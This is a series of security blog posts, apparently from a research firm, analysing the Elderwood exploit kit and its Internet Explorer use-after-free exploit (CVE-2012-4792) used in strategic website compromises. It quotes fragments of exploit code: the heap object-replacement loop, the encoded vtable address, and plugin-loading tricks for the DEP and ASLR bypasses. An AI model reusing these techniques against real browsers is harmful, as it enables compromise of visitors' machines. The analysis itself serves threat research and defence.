Notably, the vulnerability trigger is the only part of the exploit that is wrapped in a try/catch block. In testing, we confirmed that this try/catch is not a necessary condition for triggering the vulnerability or for successful exploitation. If the author were concerned about unhandled exceptions, they could have wrapped all their code in a try/catch instead of only this part. This condition suggests that the vulnerability trigger is separate from any code the developed wrote on their own and may have been automatically generated.

Further, the vulnerability trigger is the one part of the exploit code that a fuzzer can generate on its own. Such a security testing tool might have wrapped many DOM manipulations in try/catch blocks on every page load to maximize the testing possible without relaunching the browser. Given the number of other unnecessary operations left in the code, it is likely that the output of a fuzzer was pasted into the exploit code and the try/catch it used was left intact.

Replace the Object

To replace the freed CButton object with memory under their control, the attacker consumes 20 allocations from the LFH and then targets the 21st allocation for the replacement. The choice to target the 21st allocation was likely made through observation or experimentation, rather than precise knowledge of heap memory. As we will discuss in the following section, this assumption leads to unreliable behavior from the exploit. If the author had a better understanding of heap operations and changed these few lines of code, the exploit could have been much more effective.

for (var i = 0; i < 20; i++) {
	arrObject[i].className = unescape("ababababababababababababababababababababa");
window.location = unescape("%u0d0c%u10abhttps://www.google.com/settings/account");

The window.location line has two purposes: it creates a replacement object and triggers the use of the stale pointer. As with most every other heap allocation created for this exploit, the unescape() function is called to create a string. This time it is slightly different. The exploit author uses %u encoding to fully control the first DWORD in the allocation, the vtable of an object.

For the replaced object, the memory will look like this:

19eb1c00  10ab0d0c 00740068 00700074 003a0073  ….h.t.t.p.s.:.
19eb1c10  002f002f 00770077 002e0077 006f0067  /./.w.w.w...g.o.
19eb1c20  0067006f 0065006c 0063002e 006d006f  o.g.l.e...c.o.m.
19eb1c30  0073002f 00740065 00690074 0067006e  /.s.e.t.t.i.n.g.
19eb1c40  002f0073 00630061 006f0063 006e0075  s./.a.c.c.o.u.n.
19eb1c50  00000074 00000061 f0608e93 ff0c0000  t...a.....`.....

When window.location is set, the browser goes to the URL provided in the string. This change of location will free all the allocations created by the current page since they are no longer necessary. This triggers the use of the freed object and this is when the attacker gains control of the browser process. In this case, this causes the browser to load “/[unprintablebytes]https://www.google.com/settings/account” on the current domain. Since this URL does not exist, the iframe loading the exploit on the CFR website will show an error page.

In summary, the exploit overwrites a freed CButton object with data that the attacker controls. In this case, a very fragile technique to overwrite the freed CButton object was used and the exploits fails to reliably gain control of execution on exploited browsers as result. Instead of overwriting a large amount of objects that may have been recently freed, the exploit writers assume that the 21st object they overwrite will always be the correct freed CButton object. This decreases the reliability of the exploit because it assumes a predetermined location of the freed CButton object in the freelist.

Now that the vulnerability can be exploited, it can be integrated with the kit by using the provided address we mentioned in the previous post, 0x10ab0d0c. By transferring control to the SWF loaded at that address, the provided ROP chains and staged payload will be run by the victim.


Contrary to popular belief, it is possible for an exploit to fail even on a platform that it “supports.” Exploits for use-after-frees rely on complex manipulation of the heap to perform controlled memory allocations. Assumptions about the state of memory may be broken by total available memory, previously visited websites, the number of CPUs present, or even changes to software running on the host. Therefore, we consider exploit reliability to be a measure of successful payload execution vs total attempts in these various scenarios.

We simulated real-world use of the Elderwood exploit for CVE-2012-4792 to determine its overall reliability. We built a Windows XP test system with versions of Internet Explorer, Flash and Java required by the exploit. Our testing routine started by going to a random website, selected from several popular websites, and then going to our testing website hosting the exploit. We think this is a close approximation of real-world use since the compromised website is not likely to be anyone’s homepage.

Under these ideal conditions, we determined the reliability of the exploit to be 60% in our testing. Although it is unnecessary to create holes to trigger the vulnerability to exploit it successfully, as described in the previous code snippets, we found that reliability drops to about 50% if these operations are not performed. We describe some of the reasons for such a low reliability below:

  • The reliance on the constant memory address provided by the SWF. If memory allocations occur elsewhere and at this address where the exploit assumes they will be, the browser will crash. For example, if a non-ASLR’d plugin is loaded at 0x10ab0d0c, the exploit will never succeed. This can also occur on Windows XP if a large module is loaded at the default load address of 0x10000000.
  • The assumption that the 21st object will be reused by the stale CButton pointer. If the stale CButton pointer reuses any other address, then this assumption will cause the exploit to fail. In this case, the exploit will dereference 0x00410042 from the allocations of the “ab” strings.
  • The use of the garbage collector to trigger the vulnerability. Using the garbage collector is a good way to trigger this vulnerability, however, it can have uncertain side effects. For example, if the heap coalesces, it is likely that the stale pointer will point to a buffer not under the attacker’s control and cause the browser to crash.

Even before testing this exploit, it was clear that it could only target a subset of affected browsers due to its reliance on Flash and other plugins for bypassing DEP and ASLR. We built an ideal test environment with these constraints and found their replacement technique to be a significant source of unreliable behavior. Nearly 50% of website visitors that should have been exploited were not due to the fragility of the replacement technique.


After being provided easy-to-use interfaces to DEP and ASLR bypasses, the user of this kit must only craft an object replacement strategy to create a working exploit. Our evaluation of the object replacement code in this exploit indicates the author’s grasp of this concept was poor and the exploit is unreliable as a result. Reliability of this exploit would have been much higher if the author had a better understanding of heap operations or had followed published methodologies for object replacements. Instead, the author relied upon assumptions about the state of memory and parts of their work appear copied from cookbook example code.

Up until this point, the case could be made that the many examples of copied example code were the result of a false flag. Our analysis indicates that, in the part of the exploit that mattered most, the level of skill displayed by the user remained consistent with the rest of the exploit. If the attacker were feigning incompetence, it is unlikely that this critical section of code would be impaired in more than a superficial way. Instead, this attack campaign lost nearly half of the few website visitors that it could have exploited. Many in the security industry believe that APT groups “weaponize” exploits before using them in the wild. However, continued use of the Elderwood kit for strategic website compromises indicates that neither solid engineering practices nor highly reliable exploit code is required for this attacker group to achieve their goals.

Writing Exploits with the Elderwood Kit (Part 1)

In the second part of our five-part series, we investigate the tools provided by the Elderwood kit for developing exploits from discovered vulnerabilities.

Several mitigations must be avoided or bypassed in order to exploit browser vulnerabilities, even on platforms as old as Windows XP. Elderwood provides tools to overcome these obstacles with little to no knowledge required of their underlying implementation. Historical use of the Elderwood kit for browser exploits has been focused on use-after-free vulnerabilities in Internet Explorer. Exploitation of use-after-free vulnerabilities is well documented and systematic and a quick search reveals several detailed walkthroughs. Exploits of this type have three primary obstacles to overcome:

  • Heap spray technique
  • DEP bypass
  • ASLR bypass

Each component of the kit abstracts a method for overcoming these obstacles in straightforward way. We examine how these components work, their reliability, technical sophistication, and describe how these components are exposed to the kit user. Supported targets and reliability of exploit code are directly tied to the design and implementation decisions of these components.

Heap Spray and DEP Bypass (today.swf)

Data Execution Prevention (DEP) prevents memory from being implicitly executable. Exploits commonly create a payload in memory as data and then try to execute it. When DEP is enabled, the attacker must have their payload explicitly marked executable. In order to bypass this protection, an exploit can take advantage of code that is already in memory and is marked executable. Many exploits chain together calls to functions to mark their payload executable in a practice sometimes referred to as return-oriented programming (ROP). Internet Explorer 8 on Windows XP and later takes advantage of DEP and this mitigation must be bypassed to successfully execute code.

Today.swf performs the DEP bypass for the user. This Flash document sets up many ROP chains in memory so that one will be at a known location (heap spraying). When Internet Explorer is exploited, the ROP chain performs pivots the stack to one of the fake stacks instead of the legitimate one. After the stack pivot, the ROP chain executes a sequence of instructions to make an executable copy of the deobfuscation code that turns xsainfo.jpg into a DLL, and executes it. This can be done from within Flash, a plugin, because it shares the same memory space as the browser rendering process, unlike Chrome and Safari and Firefox.

The SWF is included before the JavaScript exploit code is loaded. When the swf is loaded, the heap spraying code is run automatically. The user does not need to know about the details of the technique that it uses. The end result is that the heap is full of the stack frames and the kit user can assume that proper values will be at a specific address, 0x10ab0d0c. This means that the user only needs to know the single value of where to jump to.

window.location = unescape("%u0d0c%u10abhttps://www.google.com/settings/account");

For readers following along with our analysis, the software used to obfuscate the Flash component of the exploit is conveniently located on the first page of Google results for “SWF Encryption.” DoSWF is the first result that does not require an email address to download the installer and, as an added bonus, is developed by a Chinese company from Beijing.

As seen with many public exploits, it’s possible to perform this same task with only the JavaScript engine within the browser. This would remove the dependency on a third party plugin. Instead, this exploit will only work on browsers that have Flash installed and enabled. Techniques and libraries to perform precise heap manipulation in JavaScript are well-documented and have existed since at least 2007.

ASLR Bypass (Microsoft Office and Java 6)

Address Space Layout Randomization (ASLR) is an exploit mitigation present on Windows Vista and newer that randomizes the location of code in memory. ASLR frustrates an attacker’s ability to control program flow by making the location of code used for ROP gadgets unknown for reuse. The easiest possible method to bypass ASLR is to avoid it entirely by locating a module that is not compiled with the Dynamic Base flag, indicating a lack of support for this feature. This makes exploitation significantly easier and eliminates the advantage conferred by this mitigation entirely. Once such a module is loaded at fixed virtual address, the attacker can repurpose known instruction sequences within it as if ASLR did not exist.

In order to bypass ASLR, the kit comes with code to load several modules that are not compiled with the Dynamic Base flag. In this case, modules from Microsoft Office 2007/2010 and the Java 6 plugin without support for ASLR have been added. Memory addresses from within these modules are used to construct the ROP chains embedded in the Flash document.

It is trivial to take advantage of this feature to bypass ASLR. In all likelihood, a script is provided by the kit to call the various plugin loading routines necessary to load the correct modules. No further work is required. The kit authors use existing research and techniques off the shelf in order to develop these scripts: sample code from Oracle is used to load Java for their ASLR bypass. This example code shows up in Google using the search “force java 6” which is notable since the author needed to specifically load this version rather than the latest, which takes advantage of ASLR.

<script type="text/javascript" src="deployJava.js"></script>
try {
	location.href = 'ms-help://'
} catch (e) {}

try {
	var ma = new ActiveXObject("SharePoint.OpenDocuments.4");
} catch(e) {}

After attempting to load these plugins, config.html sets a value based on which ones were successful. It sets the innerHTML of the “test” div tag to either true, false, default or cat. Today.swf reads this value to determine which of its built-in ROP chains to load. This means that today.swf directly depends on the results of config.html and the plugins it loads, suggesting they were likely developed together and provided for the kit user.

As with the heap spray and DEP bypass, these techniques rely on third-party components to function. Unless one of these plugins is installed and enabled, the exploit will fail on Windows 7. The kit relies on Java to be outdated because its current versions do take advantage of ASLR. This issue was addressed with a Java 6 update in July 2011 and Java 7 was never affected. In the case of Microsoft Office, this weakness was described in a public walkthrough several months before the attack, however, it remained unpatched until after the attack.

We attempted to measure the number of browsers running these plugins in order to measure the effectiveness of these ASLR bypasses and, therefore, the entire exploit. What we found is that popular websites that track browser statistics neglect to track usage of Microsoft Office plugins, instead opting to list more common plugins like Silverlight, Google Gears and Shockwave. In the case of Java 6, if this were the best case scenario and no minor versions of Java had been patched yet, only roughly 30% of website visitors could be successfully exploited.


The Elderwood kit ships with reusable components for developing exploits for use-after-free vulnerabilities. It provides a capability to spray the heap with Adobe Flash, a set of techniques to load modules without support for ASLR, and several ROP chains for various versions of Windows to bypass DEP. The user of these tools needs little to no understanding of the tasks which they accomplish. For example, instead of requiring the user to understand anything about memory layouts and heap allocations, they can simply use a constant address provided by the kit. In fact, readers who made it this far may have deeper understanding of these components than the people who need to use them.

Many exploit development needs are accounted for by using these tools, however, some tasks are specific to the discovered vulnerability. In order to use the ROP gadgets that have been placed in memory by the SWF, the toolkit user must have control of program flow. This is specific to the exploitation of each vulnerability and the toolkit cannot help the user perform this task. We discuss the specific solutions to this problem by the toolkit user in the next section.

If you’re interested in learning more about how modern attacks are developed and performed, consider coming to SummerCon early next month and taking one of our trainings. Subscribe to our newsletter to stay up-to-date on our trainings, products and blog posts.

Elderwood and the Department of Labor Hack

Recently, the Department of Labor (DoL) and several other websites were compromised to host a new zero-day exploit in Internet Explorer 8 (CVE-2013-1347). Researchers noted similarities between this attack and earlier ones attributed to Elderwood, a distinct set of tools used to develop several past strategic website compromises. We have not, however, identified any evidence for this conclusion. Several fundamental differences exist that make it unlikely that this latest exploit was produced by the Elderwood kit.

  • The Elderwood kit provides several reusable techniques for spraying the heap with Adobe Flash and bypassing DEP with other plugins. However, the DoL exploit avoids the need to use plugins by copying the code for a new exploit technique from Exodus Intelligence. This significantly improved the reliability of the exploit and the number of visitors it affected.
  • Elderwood campaigns have hosted their files directly on the compromised website. However, the DoL website was injected with code redirecting the visitor to an attacker-controlled host, which then attempted to load the exploit. This makes it more difficult for researchers to investigate this incident.
  • Elderwood campaigns use primitive host fingerprinting techniques taken from sample code on the internet to determine the exploitability of visitors. However, the DoL fingerprint code has been developed by the attackers to collect significantly more data and is not used for determining exploitability. This fingerprint information is uploaded to the attacker-controlled host for future use.

In addition, we have identified sample code discoverable on the internet as the source of several JavaScript functions that appear in both exploits. For example, the cookie tracking code was copied nearly verbatim from “Using cookies to display number of times a user has visited your page” which includes code originally from the JavaScript Application Cookbook.

The Elderwood Exploit Kit

Elderwood is a distinct set of reusable tools that has been developed by or for the Aurora APT group (sometimes known as or related to Nitro, VOHO, Violin Panda, or Mandiant Group 8). Our firm has tracked the use of the Elderwood kit due to the unique nature of the strategic website compromises and zero-day exploits it has been used to develop. We will discuss our analysis of this proprietary exploit kit in a series of blog posts this week.

In the blog posts that follow, we use the latest zero-day strategic website compromise attributed to the Elderwood kit as a case study. We use evidence from this attack to determine the sophistication of the tools provided by the kit and determine the capabilities required to operate it. By doing so, we hope to have a more honest discussion about the reality of this threat and the effectiveness of current defenses against it. At the end of our case study, we predict future use and developments of this kit and present recommendations to stay ahead of such attacks in the future.

Case Study Overview

In early December 2012, several websites were compromised and subtly repurposed to host a 0-day exploit for a use-after-free vulnerability in Internet Explorer 6, 7, and 8. The changes to these websites were not detected until several weeks later. The timeline of the attack was as follows:

Security vendors have termed this type of attacks, where a public website is compromised in order to exploit its visitors, “watering holes.” We believe a more descriptive definition is provided by ShadowServer, who describes attacks of this nature as “strategic website compromises.” Each compromised website is strategically selected for the character of web traffic that visits it. Instead of the attacker bringing victims to their website, the attacker compromises the websites that intended victims already view.

Components of the Attack

Several discrete components must be engineered and integrated by attackers in order to pull off a strategic website compromise. We describe these components below.

  • Vulnerability: Reproducible trigger of a code execution flaw in software installed on client systems, such as Adobe Reader or Internet Explorer.
  • Exploit: Code that uses the vulnerability to execute a program of the attacker’s choice (a payload) on the victim’s computer.
  • Obfuscation: Techniques applied to the exploit and payload to evade network and host-based detection systems.
  • Fingerprinting: Code to determine whether to serve an exploit to a victim’s computer.
  • Payload: Shellcode and malware that runs on the victim’s computer to further control it.
  • Compromised website: A website not legitimately owned or operated by the attackers, but that the attackers have manipulated into hosting their exploit and payload code.

The attackers placed several files on the CFR website. We enumerate these files and their roles in the compromise process below. Variations on these filenames were used across multiple compromised websites but they generally correspond to the list below.

  • config.html performed fingerprinting of the intended victims and determined whether they were a supported target of the developed exploit code.
  • news.html, robots.txt, and today.swf contained the exploit code for the zero-day vulnerability that had been discovered. robots.txt obfuscated critical sections of the exploit code to mitigate the risk of detection.
  • xsainfo.jpg contained one stage of the malware to be installed on victims that were successfully exploited.

We have posted the original files from this attack for readers to reference (pw: infected). In tomorrow’s post, we investigate the tools provided by the Elderwood kit for developing exploits from discovered vulnerabilities.

If you’re interested in learning more about how modern attacks are developed and performed, consider coming to SummerCon early next month and taking one of our trainings. Subscribe to our newsletter to stay up-to-date on our trainings, products and blog posts.

Pwn2Own Pre-Game

Just in time to get warmed up for Pwn2Own, we are delivering a joint offering of the training courses “Bug Hunting and Analysis 0x65” by Aaron Portnoy and Zef Cekaj as well as “Assured Exploitation” by Dino Dai Zovi and Alex Sotirov in New York City on January 31 – February 3. Students may take either course or both classes for a $1000 discount. Full course information is available in the Pwn2Own PreGame PDF or the full blog post after the jump.

[Read more…]


Get every new post delivered to your Inbox.

Join 4,555 other followers